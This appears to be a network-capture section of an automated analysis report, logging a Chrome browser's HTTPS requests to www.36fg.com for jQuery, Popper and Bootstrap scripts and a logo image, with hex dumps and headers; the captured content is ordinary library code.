                                                        2025-03-15 00:17:56 UTC1369INData Raw: 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 3a 76 6f 69 64 20 30 7d 2c 72 3d 5b 5d 2c 71 3d 5b 5d 2c 28 63 2e 71 73 61 3d 5a 2e 74 65 73 74 28 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 75 2b 22 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 75 2b 22 2d 5c 72 5c 5c 27 20 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 3d 27 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 5e 3d 27
                                                        Data Ascii: entsByClassName(a):void 0},r=[],q=[],(c.qsa=Z.test(n.querySelectorAll))&&(ia(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\r\\' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 6e 26 26 31 36 26 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 64 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 77 68 69 6c 65 28 62 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63
                                                        Data Ascii: n&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDoc


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.549756104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC606OUTGET /static/js/popper.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC1005INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7a-4f70"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        Age: 28897
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7cP1b27LtSEBHmlGtRe7Ufh9H10QtHJgG4E5sTa084EzbuanH0cypfbx%2FkXsZ9aTYlOESZMvHRibTTGsFR2PovRLY5B1AZTqKZF%2FMNFbydCnOkD%2BScLt0Cv%2FyR%2F%2Bjs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a7acb1c347-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1655&rtt_var=628&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1178&delivery_rate=1732937&cwnd=189&unsent_bytes=0&cid=0c8fe6f34c751953&ts=130&x=0"
                                                        2025-03-15 00:17:56 UTC364INData Raw: 34 66 37 30 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 38 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                        Data Ascii: 4f70/* Copyright (C) Federico Zivolo 2018 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44
                                                        Data Ascii: ==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BOD
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 27 74 6f 70 27 2c 6f 3d 27 74 6f 70 27 3d 3d 3d 74 3f 27 73 63 72 6f 6c 6c 54 6f 70 27 3a 27 73 63 72 6f 6c 6c 4c 65 66 74 27 2c 6e 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3b 69 66 28 27 42 4f 44 59 27 3d 3d 3d 6e 7c 7c 27 48 54 4d 4c 27 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 69 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65
                                                        Data Ascii: ength&&void 0!==arguments[1]?arguments[1]:'top',o='top'===t?'scrollTop':'scrollLeft',n=e.nodeName;if('BODY'===n||'HTML'===n){var i=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||i;return r[o]}return e[o]}function f(e,t){var o=2<argume
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 73 65 74 48 65 69 67 68 74 2d 61 3b 69 66 28 66 7c 7c 68 29 7b 76 61 72 20 75 3d 74 28 65 29 3b 66 2d 3d 6d 28 75 2c 27 78 27 29 2c 68 2d 3d 6d 28 75 2c 27 79 27 29 2c 70 2e 77 69 64 74 68 2d 3d 66 2c 70 2e 68 65 69 67 68 74 2d 3d 68 7d 72 65 74 75 72 6e 20 67 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 6f 29 7b 76 61 72 20 69 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 70 3d 72 28 31 30 29 2c 73 3d 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 64 3d 75 28 65 29 2c 61 3d 75 28 6f 29 2c 6c 3d 6e 28 65 29 2c 6d 3d 74 28 6f 29 2c 68 3d 70 61 72 73 65 46 6c 6f 61 74 28 6d 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74
                                                        Data Ascii: setHeight-a;if(f||h){var u=t(e);f-=m(u,'x'),h-=m(u,'y'),p.width-=f,p.height-=h}return g(p)}function b(e,o){var i=2<arguments.length&&void 0!==arguments[2]&&arguments[2],p=r(10),s='HTML'===o.nodeName,d=u(e),a=u(o),l=n(e),m=t(o),h=parseFloat(m.borderTopWidt
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 2c 64 3d 70 3f 45 28 65 29 3a 61 28 65 2c 74 29 3b 69 66 28 27 76 69 65 77 70 6f 72 74 27 3d 3d 3d 72 29 73 3d 79 28 64 2c 70 29 3b 65 6c 73 65 7b 76 61 72 20 6c 3b 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 3d 3d 3d 72 3f 28 6c 3d 6e 28 6f 28 74 29 29 2c 27 42 4f 44 59 27 3d 3d 3d 6c 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 6c 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 29 3a 27 77 69 6e 64 6f 77 27 3d 3d 3d 72 3f 6c 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 6c 3d 72 3b 76 61 72 20 66 3d 62 28 6c 2c 64 2c 70 29 3b 69 66 28 27 48 54 4d 4c 27 3d 3d 3d 6c 2e 6e 6f 64 65 4e 61 6d 65 26 26 21 77 28 64 29 29 7b 76 61
                                                        Data Ascii: top:0,left:0},d=p?E(e):a(e,t);if('viewport'===r)s=y(d,p);else{var l;'scrollParent'===r?(l=n(o(t)),'BODY'===l.nodeName&&(l=e.ownerDocument.documentElement)):'window'===r?l=e.ownerDocument.documentElement:l=r;var f=b(l,d,p);if('HTML'===l.nodeName&&!w(d)){va
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 68 74 3a 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2b 6f 7d 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 76 61 72 20 74 3d 7b 6c 65 66 74 3a 27 72 69 67 68 74 27 2c 72 69 67 68 74 3a 27 6c 65 66 74 27 2c 62 6f 74 74 6f 6d 3a 27 74 6f 70 27 2c 74 6f 70 3a 27 62 6f 74 74 6f 6d 27 7d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 6c 65 66 74 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 74 6f 70 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 2c 6f 29 7b 6f 3d 6f 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 3b 76 61 72 20 6e 3d 53 28 65 29 2c 69 3d 7b 77 69 64 74 68 3a 6e 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6e 2e 68 65 69 67 68 74 7d 2c 72 3d
                                                        Data Ascii: ht:e.offsetHeight+o};return i}function T(e){var t={left:'right',right:'left',bottom:'top',top:'bottom'};return e.replace(/left|right|bottom|top/g,function(e){return t[e]})}function C(e,t,o){o=o.split('-')[0];var n=S(e),i={width:n.width,height:n.height},r=
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 63 65 6d 65 6e 74 2c 65 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 43 28 74 68 69 73 2e 70 6f 70 70 65 72 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2e 70 6f 73 69 74 69 6f 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 3f 27 66 69 78 65 64 27 3a 27 61 62 73 6f 6c 75 74 65 27 2c 65 3d 50 28 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2c 65 29 2c 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 55 70 64 61 74 65 28 65 29 3a 28
                                                        Data Ascii: cement,e.positionFixed=this.options.positionFixed,e.offsets.popper=C(this.popper,e.offsets.reference,e.placement),e.offsets.popper.position=this.options.positionFixed?'fixed':'absolute',e=P(this.modifiers,e),this.state.isCreated?this.options.onUpdate(e):(
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 28 72 2c 27 73 63 72 6f 6c 6c 27 2c 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 6f 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 29 2c 6f 2e 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 72 2c 6f 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3d 21 30 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 7c 7c 28 74 68 69 73 2e 73 74 61 74 65 3d 49 28 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 74 68 69 73 2e 73 74 61 74 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 28 65 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 74 2e
                                                        Data Ascii: (r,'scroll',o.updateBound,o.scrollParents),o.scrollElement=r,o.eventsEnabled=!0,o}function F(){this.state.eventsEnabled||(this.state=I(this.reference,this.options,this.state,this.scheduleUpdate))}function R(e,t){return A(e).removeEventListener('resize',t.
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 69 63 65 28 30 2c 6f 29 29 3b 72 65 74 75 72 6e 20 74 3f 6e 2e 72 65 76 65 72 73 65 28 29 3a 6e 7d 66 75 6e 63 74 69 6f 6e 20 56 28 65 2c 74 2c 6f 2c 6e 29 7b 76 61 72 20 69 3d 65 2e 6d 61 74 63 68 28 2f 28 28 3f 3a 5c 2d 7c 5c 2b 29 3f 5c 64 2a 5c 2e 3f 5c 64 2a 29 28 2e 2a 29 2f 29 2c 72 3d 2b 69 5b 31 5d 2c 70 3d 69 5b 32 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 65 3b 69 66 28 30 3d 3d 3d 70 2e 69 6e 64 65 78 4f 66 28 27 25 27 29 29 7b 76 61 72 20 73 3b 73 77 69 74 63 68 28 70 29 7b 63 61 73 65 27 25 70 27 3a 73 3d 6f 3b 62 72 65 61 6b 3b 63 61 73 65 27 25 27 3a 63 61 73 65 27 25 72 27 3a 64 65 66 61 75 6c 74 3a 73 3d 6e 3b 7d 76 61 72 20 64 3d 67 28 73 29 3b 72 65 74 75 72 6e 20 64 5b 74 5d 2f 31 30 30 2a 72 7d 69 66 28 27 76 68 27 3d 3d 3d 70 7c
                                                        Data Ascii: ice(0,o));return t?n.reverse():n}function V(e,t,o,n){var i=e.match(/((?:\-|\+)?\d*\.?\d*)(.*)/),r=+i[1],p=i[2];if(!r)return e;if(0===p.indexOf('%')){var s;switch(p){case'%p':s=o;break;case'%':case'%r':default:s=n;}var d=g(s);return d[t]/100*r}if('vh'===p|
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 31 5d 29 3a 27 72 69 67 68 74 27 3d 3d 3d 64 3f 28 70 2e 74 6f 70 2b 3d 6f 5b 30 5d 2c 70 2e 6c 65 66 74 2b 3d 6f 5b 31 5d 29 3a 27 74 6f 70 27 3d 3d 3d 64 3f 28 70 2e 6c 65 66 74 2b 3d 6f 5b 30 5d 2c 70 2e 74 6f 70 2d 3d 6f 5b 31 5d 29 3a 27 62 6f 74 74 6f 6d 27 3d 3d 3d 64 26 26 28 70 2e 6c 65 66 74 2b 3d 6f 5b 30 5d 2c 70 2e 74 6f 70 2b 3d 6f 5b 31 5d 29 2c 65 2e 70 6f 70 70 65 72 3d 70 2c 65 7d 66 6f 72 28 76 61 72 20 4a 3d 4d 61 74 68 2e 6d 69 6e 2c 51 3d 4d 61 74 68 2e 72 6f 75 6e 64 2c 5a 3d 4d 61 74 68 2e 66 6c 6f 6f 72 2c 24 3d 4d 61 74 68 2e 6d 61 78 2c 65 65 3d 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2c 74 65 3d 5b 27
                                                        Data Ascii: 1]):'right'===d?(p.top+=o[0],p.left+=o[1]):'top'===d?(p.left+=o[0],p.top-=o[1]):'bottom'===d&&(p.left+=o[0],p.top+=o[1]),e.popper=p,e}for(var J=Math.min,Q=Math.round,Z=Math.floor,$=Math.max,ee='undefined'!=typeof window&&'undefined'!=typeof document,te=['


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.549757104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC447OUTGET /static/picture/logo-1.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC985INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 2889
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:34 GMT
                                                        etag: "60e7ae76-b49"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 45077
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI5GIm01O3lB6b0fo6%2BUt%2BC9UjWraU9gmighctz6ZOstynVYBVI3mjYYt5fP%2BvsX53l%2FsdCA8%2Fg9BHvOfBigtfrbzkU7i8XuYPh3t9EvJ%2FANLQfQSei%2BAmp3I1Musgw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a81f9fc52b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2538&min_rtt=2537&rtt_var=955&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1019&delivery_rate=1144200&cwnd=67&unsent_bytes=0&cid=f9fc8c94257bc70f&ts=134&x=0"
                                                        2025-03-15 00:17:56 UTC384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 79 00 00 00 30 08 06 00 00 00 35 ad d5 ed 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRy05tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 61 61 63 62 34 37 33 2d 62 64 33 35 2d 32 33 34 61 2d 38 38 63 61 2d 31 38 30 34 62 66 33 33 32 31 64 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 42 42 46 38 32 44 33 31 46 42 44 46 31 31 45 39 39 39 45 46 39 35 34 45 46 34 45 39 42 43 33 33 22
                                                        Data Ascii: dobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:BBF82D31FBDF11E999EF954EF4E9BC33"
                                                        2025-03-15 00:17:56 UTC1136INData Raw: 3e f0 6a 70 83 e1 3e ed 4a dd cd af 9f 01 5f 13 ca 2c 51 ce 79 2f 23 dc 73 72 27 bb 97 6e 97 e8 71 ee ad 7a 4f 4c c1 9b a5 05 b7 d8 27 b8 ab ac eb 61 e7 48 f3 3d 6c cd 18 60 5b d2 74 d4 aa 8d b8 64 40 5b d4 16 5d 42 5b a6 b9 dd 4c 75 23 b7 9d 36 e8 70 2c f8 09 ff 55 c2 48 bd 9c 47 7c 03 7b 99 46 be f7 15 77 b6 bf 02 89 ec 31 9f c5 f8 a1 dc 95 a6 39 b0 3d 80 30 fd ca b1 ad 4e a1 d3 4c 44 b9 dc 00 da 2a 12 19 65 ea b4 32 ab 75 a1 f5 32 5c 4e 9a 87 5b 21 60 bb 6b a4 27 b8 6e fd e6 58 94 99 e8 d1 d4 63 59 e8 11 c2 bd df 39 48 a3 43 7d a3 79 7a a5 39 9a 0e fa 7d 16 24 df f2 04 07 20 b9 12 e7 4b c9 56 bb 61 ee aa 9a 2d 97 a7 90 46 ad 9f fd 6e b7 c0 04 bc cf f1 c8 ee 37 05 40 7c af 69 8e 04 bc 86 5d b8 8e c3 c1 57 59 e0 9f 79 64 cf 0d 22 70 51 9e 8c 87 6a 76 a5
                                                        Data Ascii: >jp>J_,Qy/#sr'nqzOL'aH=l`[td@[]B[Lu#6p,UHG|{Fw19=0NLD*e2u2\N[!`k'nXcY9HC}yz9}$ KVa-Fn7@|i]WYyd"pQjv


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.549758104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC609OUTGET /static/js/bootstrap.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC1001INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:40 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7c-c75f"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28897
